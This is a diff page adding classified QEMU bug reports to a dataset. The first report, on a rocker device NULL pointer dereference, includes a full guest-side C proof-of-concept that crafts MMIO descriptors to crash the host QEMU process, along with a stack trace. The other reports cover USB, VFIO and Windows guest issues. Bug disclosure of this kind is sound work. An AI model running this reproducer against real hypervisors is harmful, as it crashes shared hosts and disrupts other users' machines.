summary refs log tree commit diff stats
path: root/results/classifier/108/other/1851
diff options
context:
space:
mode:
Diffstat (limited to '')
-rw-r--r--results/classifier/108/other/1851450
-rw-r--r--results/classifier/108/other/185154769
-rw-r--r--results/classifier/108/other/185166452
-rw-r--r--results/classifier/108/other/185184543
-rw-r--r--results/classifier/108/other/185193936
-rw-r--r--results/classifier/108/other/1851972137
6 files changed, 787 insertions, 0 deletions
diff --git a/results/classifier/108/other/1851 b/results/classifier/108/other/1851
new file mode 100644
index 000000000..d4b6c1e76
--- /dev/null
+++ b/results/classifier/108/other/1851
@@ -0,0 +1,450 @@
+device: 0.793
+other: 0.757
+graphic: 0.755
+permissions: 0.744
+performance: 0.744
+socket: 0.662
+network: 0.648
+files: 0.629
+PID: 0.619
+KVM: 0.614
+vnc: 0.598
+debug: 0.595
+boot: 0.578
+semantic: 0.545
+
+hw/net/rocker: NULL pointer dereference in of_dpa_cmd_add_l2_flood
+Description of problem:
+rocker_tlv_parse_nested could return early because of no group ids in the group_tlvs. In such case tlvs is NULL; tlvs\[i + 1\] in the next for-loop will deref the NULL pointer.
+Steps to reproduce:
+Compile and run the following code within the guest:
+
+```
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <assert.h>
+#include <fcntl.h>
+#include <inttypes.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <sys/io.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <err.h>
+#include <errno.h>
+#include <pthread.h>
+
+/*
+ * Rocker DMA ring register offsets
+ */
+#define ROCKER_DMA_DESC_BASE            0x1000
+#define ROCKER_DMA_DESC_SIZE            32
+#define ROCKER_DMA_DESC_MASK            0x1F
+#define ROCKER_DMA_DESC_TOTAL_SIZE \
+    (ROCKER_DMA_DESC_SIZE * 64) /* 62 ports + event + cmd */
+#define ROCKER_DMA_DESC_ADDR_OFFSET     0x00     /* 8-byte */
+#define ROCKER_DMA_DESC_SIZE_OFFSET     0x08
+#define ROCKER_DMA_DESC_HEAD_OFFSET     0x0c
+#define ROCKER_DMA_DESC_TAIL_OFFSET     0x10
+#define ROCKER_DMA_DESC_CTRL_OFFSET     0x14
+#define ROCKER_DMA_DESC_CREDITS_OFFSET  0x18
+#define ROCKER_DMA_DESC_RSVD_OFFSET     0x1c
+
+/*
+ * Rocker dma ctrl register bits
+ */
+#define ROCKER_DMA_DESC_CTRL_RESET      (1 << 0)
+
+/*
+ * Rocker test registers
+ */
+#define ROCKER_TEST_REG                 0x0010
+#define ROCKER_TEST_REG64               0x0018  /* 8-byte */
+#define ROCKER_TEST_IRQ                 0x0020
+#define ROCKER_TEST_DMA_ADDR            0x0028  /* 8-byte */
+#define ROCKER_TEST_DMA_SIZE            0x0030
+#define ROCKER_TEST_DMA_CTRL            0x0034
+
+/*
+ * Rocker general purpose registers
+ */
+#define ROCKER_CONTROL                  0x0300
+#define ROCKER_PORT_PHYS_COUNT          0x0304
+#define ROCKER_PORT_PHYS_LINK_STATUS    0x0310 /* 8-byte */
+#define ROCKER_PORT_PHYS_ENABLE         0x0318 /* 8-byte */
+#define ROCKER_SWITCH_ID                0x0320 /* 8-byte */
+
+/*
+ * Rocker test register ctrl
+ */
+#define ROCKER_TEST_DMA_CTRL_CLEAR      (1 << 0)
+#define ROCKER_TEST_DMA_CTRL_FILL       (1 << 1)
+#define ROCKER_TEST_DMA_CTRL_INVERT     (1 << 2)
+
+#define __le16 uint16_t
+#define __le32 uint32_t
+#define __le64 uint64_t
+
+typedef struct rocker_desc {
+    __le64 buf_addr;
+    uint64_t cookie;
+    __le16 buf_size;
+    __le16 tlv_size;
+    __le16 rsvd[5];   /* pad to 32 bytes */
+    __le16 comp_err;
+} __attribute__((packed, aligned(8))) RockerDesc;
+
+
+/*
+ * Rocker TLV type fields
+ */
+
+typedef struct rocker_tlv {
+    __le32 type;
+    __le16 len;
+    __le16 rsvd;
+} __attribute__((packed, aligned(8))) RockerTlv;
+
+
+typedef struct cmd_group_msg {
+    RockerTlv tlv1;
+    __le64 t1_value;
+    RockerTlv tlv2;
+    __le64 t2_value;
+    RockerTlv tlv3;
+    __le64 t3_value;
+} __attribute__((packed, aligned(8))) CmdGroupMsg;
+
+
+typedef struct cmd_msg {
+    RockerTlv tlv1;
+    __le64 t1_value;
+    RockerTlv tlv2;
+    CmdGroupMsg group_msg;
+} __attribute__((packed, aligned(8))) CmdMsg;
+
+
+typedef struct rx_msg {
+    RockerTlv tlv1;
+    __le64 t1_value;
+    RockerTlv tlv2;
+    __le64 t2_value;
+    RockerTlv tlv3;
+    __le64 t3_value;
+    RockerTlv tlv4;
+    __le64 t4_value;
+    RockerTlv tlv5;
+    __le64 t5_value;
+} __attribute__((packed, aligned(8))) RxMsg;
+
+
+/* Rx msg */
+enum {
+    ROCKER_TLV_RX_UNSPEC,
+    ROCKER_TLV_RX_FLAGS,                /* u16, see RX_FLAGS_ */
+    ROCKER_TLV_RX_CSUM,                 /* u16 */
+    ROCKER_TLV_RX_FRAG_ADDR,            /* u64 */
+    ROCKER_TLV_RX_FRAG_MAX_LEN,         /* u16 */
+    ROCKER_TLV_RX_FRAG_LEN,             /* u16 */
+
+    __ROCKER_TLV_RX_MAX,
+    ROCKER_TLV_RX_MAX = __ROCKER_TLV_RX_MAX - 1,
+};
+
+/* Tx msg */
+enum {
+    ROCKER_TLV_TX_UNSPEC,
+    ROCKER_TLV_TX_OFFLOAD,              /* u8, see TX_OFFLOAD_ */
+    ROCKER_TLV_TX_L3_CSUM_OFF,          /* u16 */
+    ROCKER_TLV_TX_TSO_MSS,              /* u16 */
+    ROCKER_TLV_TX_TSO_HDR_LEN,          /* u16 */
+    ROCKER_TLV_TX_FRAGS,                /* array */
+
+    __ROCKER_TLV_TX_MAX,
+    ROCKER_TLV_TX_MAX = __ROCKER_TLV_TX_MAX - 1,
+};
+
+/* cmd msg */
+enum {
+    ROCKER_TLV_CMD_UNSPEC,
+    ROCKER_TLV_CMD_TYPE,                /* u16 */
+    ROCKER_TLV_CMD_INFO,                /* nest */
+
+    __ROCKER_TLV_CMD_MAX,
+    ROCKER_TLV_CMD_MAX = __ROCKER_TLV_CMD_MAX - 1,
+};
+
+enum {
+    ROCKER_TLV_CMD_TYPE_UNSPEC,
+    ROCKER_TLV_CMD_TYPE_GET_PORT_SETTINGS,
+    ROCKER_TLV_CMD_TYPE_SET_PORT_SETTINGS,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_ADD,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_MOD,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_DEL,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_GET_STATS,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_MOD,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_DEL,
+    ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_GET_STATS,
+
+    __ROCKER_TLV_CMD_TYPE_MAX,
+    ROCKER_TLV_CMD_TYPE_MAX = __ROCKER_TLV_CMD_TYPE_MAX - 1,
+};
+
+/*
+ * cmd info nested for OF-DPA msgs
+ */
+
+enum {
+    ROCKER_TLV_OF_DPA_UNSPEC,
+    ROCKER_TLV_OF_DPA_TABLE_ID,            /* u16 */
+    ROCKER_TLV_OF_DPA_PRIORITY,            /* u32 */
+    ROCKER_TLV_OF_DPA_HARDTIME,            /* u32 */
+    ROCKER_TLV_OF_DPA_IDLETIME,            /* u32 */
+    ROCKER_TLV_OF_DPA_COOKIE,              /* u64 */
+    ROCKER_TLV_OF_DPA_IN_PPORT,            /* u32 */
+    ROCKER_TLV_OF_DPA_IN_PPORT_MASK,       /* u32 */
+    ROCKER_TLV_OF_DPA_OUT_PPORT,           /* u32 */
+    ROCKER_TLV_OF_DPA_GOTO_TABLE_ID,       /* u16 */
+    ROCKER_TLV_OF_DPA_GROUP_ID,            /* u32 */
+    ROCKER_TLV_OF_DPA_GROUP_ID_LOWER,      /* u32 */
+    ROCKER_TLV_OF_DPA_GROUP_COUNT,         /* u16 */
+    ROCKER_TLV_OF_DPA_GROUP_IDS,           /* u32 array */
+    ROCKER_TLV_OF_DPA_VLAN_ID,             /* __be16 */
+    ROCKER_TLV_OF_DPA_VLAN_ID_MASK,        /* __be16 */
+    ROCKER_TLV_OF_DPA_VLAN_PCP,            /* __be16 */
+    ROCKER_TLV_OF_DPA_VLAN_PCP_MASK,       /* __be16 */
+    ROCKER_TLV_OF_DPA_VLAN_PCP_ACTION,     /* u8 */
+    ROCKER_TLV_OF_DPA_NEW_VLAN_ID,         /* __be16 */
+    ROCKER_TLV_OF_DPA_NEW_VLAN_PCP,        /* u8 */
+    ROCKER_TLV_OF_DPA_TUNNEL_ID,           /* u32 */
+    ROCKER_TLV_OF_DPA_TUNNEL_LPORT,        /* u32 */
+    ROCKER_TLV_OF_DPA_ETHERTYPE,           /* __be16 */
+    ROCKER_TLV_OF_DPA_DST_MAC,             /* binary */
+    ROCKER_TLV_OF_DPA_DST_MAC_MASK,        /* binary */
+    ROCKER_TLV_OF_DPA_SRC_MAC,             /* binary */
+    ROCKER_TLV_OF_DPA_SRC_MAC_MASK,        /* binary */
+    ROCKER_TLV_OF_DPA_IP_PROTO,            /* u8 */
+    ROCKER_TLV_OF_DPA_IP_PROTO_MASK,       /* u8 */
+    ROCKER_TLV_OF_DPA_IP_DSCP,             /* u8 */
+    ROCKER_TLV_OF_DPA_IP_DSCP_MASK,        /* u8 */
+    ROCKER_TLV_OF_DPA_IP_DSCP_ACTION,      /* u8 */
+    ROCKER_TLV_OF_DPA_NEW_IP_DSCP,         /* u8 */
+    ROCKER_TLV_OF_DPA_IP_ECN,              /* u8 */
+    ROCKER_TLV_OF_DPA_IP_ECN_MASK,         /* u8 */
+    ROCKER_TLV_OF_DPA_DST_IP,              /* __be32 */
+    ROCKER_TLV_OF_DPA_DST_IP_MASK,         /* __be32 */
+    ROCKER_TLV_OF_DPA_SRC_IP,              /* __be32 */
+    ROCKER_TLV_OF_DPA_SRC_IP_MASK,         /* __be32 */
+    ROCKER_TLV_OF_DPA_DST_IPV6,            /* binary */
+    ROCKER_TLV_OF_DPA_DST_IPV6_MASK,       /* binary */
+    ROCKER_TLV_OF_DPA_SRC_IPV6,            /* binary */
+    ROCKER_TLV_OF_DPA_SRC_IPV6_MASK,       /* binary */
+    ROCKER_TLV_OF_DPA_SRC_ARP_IP,          /* __be32 */
+    ROCKER_TLV_OF_DPA_SRC_ARP_IP_MASK,     /* __be32 */
+    ROCKER_TLV_OF_DPA_L4_DST_PORT,         /* __be16 */
+    ROCKER_TLV_OF_DPA_L4_DST_PORT_MASK,    /* __be16 */
+    ROCKER_TLV_OF_DPA_L4_SRC_PORT,         /* __be16 */
+    ROCKER_TLV_OF_DPA_L4_SRC_PORT_MASK,    /* __be16 */
+    ROCKER_TLV_OF_DPA_ICMP_TYPE,           /* u8 */
+    ROCKER_TLV_OF_DPA_ICMP_TYPE_MASK,      /* u8 */
+    ROCKER_TLV_OF_DPA_ICMP_CODE,           /* u8 */
+    ROCKER_TLV_OF_DPA_ICMP_CODE_MASK,      /* u8 */
+    ROCKER_TLV_OF_DPA_IPV6_LABEL,          /* __be32 */
+    ROCKER_TLV_OF_DPA_IPV6_LABEL_MASK,     /* __be32 */
+    ROCKER_TLV_OF_DPA_QUEUE_ID_ACTION,     /* u8 */
+    ROCKER_TLV_OF_DPA_NEW_QUEUE_ID,        /* u8 */
+    ROCKER_TLV_OF_DPA_CLEAR_ACTIONS,       /* u32 */
+    ROCKER_TLV_OF_DPA_POP_VLAN,            /* u8 */
+    ROCKER_TLV_OF_DPA_TTL_CHECK,           /* u8 */
+    ROCKER_TLV_OF_DPA_COPY_CPU_ACTION,     /* u8 */
+
+    __ROCKER_TLV_OF_DPA_MAX,
+    ROCKER_TLV_OF_DPA_MAX = __ROCKER_TLV_OF_DPA_MAX - 1,
+};
+
+#define PAGE_SHIFT  12
+#define PAGE_SIZE   (1 << PAGE_SHIFT)
+#define PFN_PRESENT (1ull << 63)
+#define PFN_PFN     ((1ull << 55) - 1)
+
+uint64_t get_physical_pfn(void* ptr)
+{
+    uint64_t pfn = -1;
+    FILE* fp = fopen("/proc/self/pagemap", "rb");
+    if (!fp)
+    {
+        return pfn;
+    }
+
+    if (!fseek(fp, (unsigned long)ptr / PAGE_SIZE * 8, SEEK_SET))
+    {
+        fread(&pfn, sizeof(pfn), 1, fp);
+        if (pfn & PFN_PRESENT)
+        {
+            pfn &= PFN_PFN;
+        }
+    }
+    fclose(fp);
+    return pfn;
+}
+
+uint64_t get_physical_addr(void* ptr)
+{
+    uint64_t pfn = get_physical_pfn(ptr);
+    return pfn * PAGE_SIZE + (uint64_t)ptr % PAGE_SIZE;
+}
+
+void* mmio_mem;
+
+void mmio_write(uint32_t addr, uint32_t value)
+{
+    *((uint32_t*)(mmio_mem + addr))= value;
+}
+
+void mmio_write64(uint32_t addr, uint64_t value)
+{
+    *((uint64_t*)(mmio_mem + addr))= value;
+}
+
+uint64_t mmio_read(uint32_t addr)
+{
+    return *((uint64_t*)(mmio_mem +addr));
+}
+
+uint64_t mmio_read64(uint64_t addr)
+{
+    return *((uint64_t*)(mmio_mem +addr));
+}
+
+uint64_t ring_desk_base_addr(int index)
+{
+    return ROCKER_DMA_DESC_BASE + index * 32;
+}
+
+int main()
+{
+    int mmio_fd= open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
+    if (mmio_fd== -1) {
+        printf("mmio_fd open failed");
+    	return 1;
+    }
+
+    mmio_mem = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
+    if (mmio_mem == MAP_FAILED) {
+        printf("mmap mmio_mem failed");
+	return 1;
+    }
+
+    iopl(3);
+
+    RockerTlv cmd_group_tlv = {ROCKER_TLV_OF_DPA_GROUP_ID, sizeof(RockerTlv) + sizeof(__le64), 12345 };
+    RockerTlv cmd_count_tlv = {ROCKER_TLV_OF_DPA_GROUP_COUNT, sizeof(RockerTlv) + sizeof(__le64), 12345};
+    RockerTlv cmd_ids_tlv = {ROCKER_TLV_OF_DPA_GROUP_IDS, sizeof(RockerTlv) + sizeof(__le64), 12345 };
+
+    CmdGroupMsg group_msg = { cmd_group_tlv, 0x40000000, cmd_count_tlv, 65535, cmd_ids_tlv, 12345};
+
+    RockerTlv cmd_type_tlv = {ROCKER_TLV_CMD_TYPE, sizeof(RockerTlv) + sizeof(__le64), 12345 };
+    RockerTlv cmd_info_tlv = {ROCKER_TLV_CMD_INFO, sizeof(RockerTlv) + sizeof(CmdGroupMsg), 12345 };
+    CmdMsg cmd_msg = {cmd_type_tlv, ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD, cmd_info_tlv, group_msg };
+    RockerDesc cmd_desc = {get_physical_addr(&cmd_msg), 0xdeadbeef, sizeof(CmdMsg), sizeof(CmdMsg), 0x1, 0x4242 };
+
+    mmio_write64(ROCKER_PORT_PHYS_ENABLE, 0xE);
+
+    // cmd ring
+    mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_CTRL_OFFSET, ROCKER_DMA_DESC_CTRL_RESET);
+    // base_addr
+    mmio_write64(ring_desk_base_addr(0), get_physical_addr(&cmd_desc));
+    mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_SIZE_OFFSET, 8);
+    mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_HEAD_OFFSET, 4);
+
+    printf("End\n");
+    return 0;
+}
+```
+
+Stack trace:
+
+```plaintext
+===================================================================================================
+ldl_he_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:359)
+ldl_le_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:394)
+rocker_tlv_get_le32(const RockerTlv * tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_tlv.h:114)
+of_dpa_cmd_add_l2_flood(OfDpa * of_dpa, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2043)
+of_dpa_cmd_group_do(OfDpa * of_dpa, uint32_t group_id, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2125)
+of_dpa_cmd_group_add(OfDpa * of_dpa, uint32_t group_id, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2145)
+of_dpa_group_cmd(OfDpa * of_dpa, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2204)
+of_dpa_cmd(World * world, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2234)
+world_do_cmd(World * world, DescInfo * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_world.c:43)
+cmd_consume(Rocker * r, DescInfo * info) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:450)
+ring_pump(DescRing * ring) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:242)
+desc_ring_set_head(DescRing * ring, uint32_t new) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:281)
+rocker_io_writel(void * opaque, hwaddr addr, uint32_t val) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:805)
+rocker_mmio_write(void * opaque, hwaddr addr, uint64_t val, unsigned int size) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:996)
+memory_region_write_accessor(MemoryRegion * mr, hwaddr addr, uint64_t * value, unsigned int size, int shift, uint64_t mask, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:492)
+access_with_adjusted_size(hwaddr addr, uint64_t * value, unsigned int size, unsigned int access_size_min, unsigned int access_size_max, MemTxResult (*)(MemoryRegion *, hwaddr, uint64_t *, unsigned int, int, uint64_t, MemTxAttrs) access_fn, MemoryRegion * mr, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:554)
+memory_region_dispatch_write(MemoryRegion * mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:1514)
+flatview_write_continue(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion * mr) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2783)
+flatview_write(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2823)
+address_space_write(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2915)
+address_space_rw(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, void * buf, hwaddr len, _Bool is_write) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2925)
+kvm_cpu_exec(CPUState * cpu) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-all.c:2929)
+kvm_vcpu_thread_fn(void * arg) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-accel-ops.c:49)
+qemu_thread_start(void * args) (/home/arayz/arayz/qemu-git-e1000e/util/qemu-thread-posix.c:556)
+libpthread.so.0!start_thread(void * arg) (/build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477)
+libc.so.6!clone() (/build/glibc-sMfBJT/glibc-2.31/sysdeps/unix/sysv/linux/x86_64/clone.S:95)
+===================================================================================================
+
+    disassemble and register context:
+===================================================================================================
+Dump of assembler code for function ldl_he_p:
+   0x000055d8a1a473e6 <+0>:	push   %rbp
+   0x000055d8a1a473e7 <+1>:	mov    %rsp,%rbp
+   0x000055d8a1a473ea <+4>:	sub    $0x20,%rsp
+   0x000055d8a1a473ee <+8>:	mov    %rdi,-0x18(%rbp)
+   0x000055d8a1a473f2 <+12>:	mov    %fs:0x28,%rax
+   0x000055d8a1a473fb <+21>:	mov    %rax,-0x8(%rbp)
+   0x000055d8a1a473ff <+25>:	xor    %eax,%eax
+   0x000055d8a1a47401 <+27>:	mov    -0x18(%rbp),%rax
+=> 0x000055d8a1a47405 <+31>:	mov    (%rax),%eax
+   0x000055d8a1a47407 <+33>:	mov    %eax,-0xc(%rbp)
+   0x000055d8a1a4740a <+36>:	mov    -0xc(%rbp),%eax
+   0x000055d8a1a4740d <+39>:	mov    -0x8(%rbp),%rdx
+   0x000055d8a1a47411 <+43>:	xor    %fs:0x28,%rdx
+   0x000055d8a1a4741a <+52>:	je     0x55d8a1a47421 <ldl_he_p+59>
+   0x000055d8a1a4741c <+54>:	callq  0x55d8a186d6d0 <__stack_chk_fail@plt>
+   0x000055d8a1a47421 <+59>:	leaveq 
+   0x000055d8a1a47422 <+60>:	retq   
+End of assembler dump.
+
+rax            0x8                 8
+rbx            0x7f7828088ac0      140154044451520
+rcx            0x0                 0
+rdx            0x7f7828088ac0      140154044451520
+rsi            0x8                 8
+rdi            0x8                 8
+rbp            0x7f7832cfd100      0x7f7832cfd100
+rsp            0x7f7832cfd0e0      0x7f7832cfd0e0
+r8             0x7f7828088ac0      140154044451520
+r9             0x7f7828000790      140154043893648
+r10            0x7f78280008d0      140154043893968
+r11            0x7f7828000080      140154043891840
+r12            0x7ffec007cb1e      140732120156958
+r13            0x7ffec007cb1f      140732120156959
+r14            0x7ffec007cbe0      140732120157152
+r15            0x7f7832cfdb00      140154225285888
+rip            0x55d8a1a47405      0x55d8a1a47405 <ldl_he_p+31>
+eflags         0x10246             [ PF ZF IF RF ]
+cs             0x33                51
+ss             0x2b                43
+ds             0x0                 0
+es             0x0                 0
+fs             0x0                 0
+gs             0x0                 0
+===================================================================================================
+```
+Additional information:
+This was wrongly assigned a high-severity CVE and is being discussed on qemu-devel ML: https://lists.nongnu.org/archive/html/qemu-devel/2023-08/msg04621.html
diff --git a/results/classifier/108/other/1851547 b/results/classifier/108/other/1851547
new file mode 100644
index 000000000..dff728411
--- /dev/null
+++ b/results/classifier/108/other/1851547
@@ -0,0 +1,69 @@
+other: 0.703
+permissions: 0.680
+debug: 0.636
+network: 0.597
+PID: 0.595
+vnc: 0.592
+semantic: 0.585
+KVM: 0.556
+device: 0.553
+performance: 0.546
+graphic: 0.539
+boot: 0.521
+socket: 0.467
+files: 0.444
+
+qemu 4 crashes with this parameter attached -usb -device usb-host,hostbus=1,hostaddr=7 \
+
+Hello.
+
+qemu / kvm does not start anymore after upgrading ubuntu from 19.04 to 19.10 and qemu from 3 to 4,as you can see below. what can I do ?
+
+root@ziomario-Z390-AORUS-PRO:/home/ziomario/Scrivania/OS-KVM# ./boot-OS-HSP2.sh
+
+----> qemu-system-x86_64: /build/qemu-UryNDZ/qemu-4.0+dfsg/hw/usb/core.c:720: usb_ep_get: asserzione "dev != NULL" non riuscita.
+
+./boot-OS-HSP2.sh: riga 40: 26312 Annullato (core dump creato) qemu-system-x86_64 -enable-kvm -m 16000 -cpu Penryn,kvm=on,vendor=GenuineIntel,+invtsc,vmware-cpuid-freq=on,$MY_OPTIONS -machine pc-q35-2.9 -smp 4,cores=2 -vga none -device vfio-pci,host=01:00.0,bus=pcie.0,multifunction=on -device vfio-pci,host=01:00.1,bus=pcie.0 -device vfio-pci,host=01:00.2,bus=pcie.0 -device vfio-pci,host=01:00.3,bus=pcie.0 -usb -device usb-host,hostbus=1,hostaddr=7 -drive if=pflash,format=raw,readonly,file=$OVMF/OVMF_CODE.fd -drive if=pflash,format=raw,file=$OVMF/OVMF_VARS-1024x768.fd -smbios type=2 -device ich9-ahci,id=sata -drive id=Clover,if=none,snapshot=on,format=qcow2,file=./'Mo/CloverNG.qcow2' -device ide-hd,bus=sata.2,drive=Clover -device ide-hd,bus=sata.3,drive=InstallMedia -drive id=InstallMedia,if=none,file=BaseSystemHS.img,format=raw -drive id=BsdHDD,if=none,file=/dev/sdg,format=raw -device ide-hd,bus=sata.4,drive=BsdHDD -netdev tap,id=net0,ifname=tap0,script=no,downscript=no -device e1000-82545em,netdev=net0,id=net0,mac=52:54:00:c9:18:27 -monitor stdio
+
+It seems that this line is not good anymore (it worked with qemu 3.x) : 
+
+-usb -device usb-host,hostbus=1,hostaddr=7 \
+
+when I removed it,it works. But I need that. With what can I change it ? You can reproduce that upgrading ubuntu 19.04 to 19.10 because in that way also qemu will be upgraded from 3 to 4. These are the packages that I'm using :
+
+root@ziomario-Z390-AORUS-PRO:/home/ziomario# qemu-system-x86_64 --version
+QEMU emulator version 4.0.0 (Debian 1:4.0+dfsg-0ubuntu9)
+
+problem resolved changing this line :
+
+-usb -device usb-host,hostbus=1,hostaddr=7 \
+
+with this :
+
+-usb -device usb-host,hostbus=1,hostaddr=8 \
+
+it works with qemu 4.
+
+Hi Marietto,
+  Can you attach an lsusb output from your host?
+I'm curious what host bug 1, addr 7 and 8 are.
+
+Dave
+
+001:008 Compx 2.4G Receiver. Problem arise because I've detached one of my USB disk and the numbering of the USB devices attached changed. specially the compx 2.4g receiver changed from hostaddr 7 to 8 and when this happens qemu 4 seems to work not as good as qemu 3.
+
+The QEMU project is currently considering to move its bug tracking to
+another system. For this we need to know which bugs are still valid
+and which could be closed already. Thus we are setting older bugs to
+"Incomplete" now.
+
+If you still think this bug report here is valid, then please switch
+the state back to "New" within the next 60 days, otherwise this report
+will be marked as "Expired". Or please mark it as "Fix Released" if
+the problem has been solved with a newer version of QEMU already.
+
+Thank you and sorry for the inconvenience.
+
+
+[Expired for QEMU because there has been no activity for 60 days.]
+
diff --git a/results/classifier/108/other/1851664 b/results/classifier/108/other/1851664
new file mode 100644
index 000000000..102d17910
--- /dev/null
+++ b/results/classifier/108/other/1851664
@@ -0,0 +1,52 @@
+performance: 0.660
+graphic: 0.545
+semantic: 0.528
+device: 0.510
+other: 0.445
+network: 0.396
+boot: 0.396
+KVM: 0.381
+PID: 0.376
+socket: 0.372
+permissions: 0.336
+files: 0.332
+debug: 0.326
+vnc: 0.187
+
+qemu-system-x86_64: "VFIO_MAP_DMA : -28" error when we attache 6 VF's to guest machine
+
+We are trying to attach 6 VF's to the guest machine on 4.1.1 qemu emulator.
+We are observing "VFIO_MAP_DMA : -28" error.
+
+We are using w-bits=48 bits while lunching VM.
+
+Please provide information how you started QEMU, and some information about your PCI device (e.g. the output of lspci).
+
+qemu-system-x86_64 -name guest=fedora24 -machine q35,accel=kvm,kernel-irqchip=split \
+        -enable-kvm \
+        -m 4G \
+        -smp 8,sockets=1,cores=8,threads=1 \
+        -device intel-iommu,intremap=on,caching-mode=on,aw-bits=48  \
+        -drive file=<OS_IMAGE_FILE>,format=raw \
+        -device ioh3420,id=pcie.1,chassis=1 \
+        -device virtio-net-pci,bus=pcie.1,disable-legacy=on,disable-modern=off,iommu_platform=on,ats=on,netdev=net0 \
+        -netdev user,id=net0,hostfwd=tcp::1111-:22\
+        -device vfio-pci,host=3f:02.1  \
+		-device vfio-pci,host=3f:02.2  \
+		-device vfio-pci,host=3f:02.3 \
+		-device vfio-pci,host=3f:02.4 \
+        -device vfio-pci,host=3d:02.4 \
+		-device vfio-pci,host=3d:02.5 \
+		-device vfio-pci,host=3d:02.6 \
+        -nographic
+
+Please find the above qemu command to lunch guest machine
+
+Presumably w-bits (aw-bits?) implies using intel-iommu, there's a opportunity for the vfio iommu backend to return -ENOSPC (-28) if we exceed the default number of in-flight DMA mappings per container.  The default limit is 65535.  You can try increasing this by changing the dma_entry_limit module option on the vfio_iommu_type1 module.  Note that in a typical vIOMMU config there's a container per device, so the number of VFs attached is possibly not a factor.  It is however a lot of DMA mappings for a single device if this is the issue and you'd generally want to boot the guest with iommu=pt in order to have reasonable assigned device performance with a vIOMMU, which would also greatly reduce the number of mappings.
+
+After increasing dma_entry_limit limit no issue observed.
+
+But ideal senario device is getting hung and recovery happening only with host hard rebooting.
+
+[Expired for QEMU because there has been no activity for 60 days.]
+
diff --git a/results/classifier/108/other/1851845 b/results/classifier/108/other/1851845
new file mode 100644
index 000000000..e91d4acac
--- /dev/null
+++ b/results/classifier/108/other/1851845
@@ -0,0 +1,43 @@
+permissions: 0.896
+files: 0.878
+other: 0.875
+debug: 0.875
+graphic: 0.867
+performance: 0.867
+vnc: 0.861
+KVM: 0.841
+device: 0.839
+boot: 0.837
+socket: 0.829
+network: 0.827
+semantic: 0.826
+PID: 0.808
+
+Windows 10 panics with BlueIris 
+
+Running Windows 10 64bit.  Starting BlueIris 64 bit causes Windows to panic with CPU type is set higher than Penryn or CPU type = host.
+
+I have been able to reproduce the same issue on Proxmox 4,5,6 as well as oVirt 3. and 4.
+
+Does not panic when CPU type is set to kvm64.
+
+
+pve-qemu-kvm/stable 4.0.1-4 amd64
+
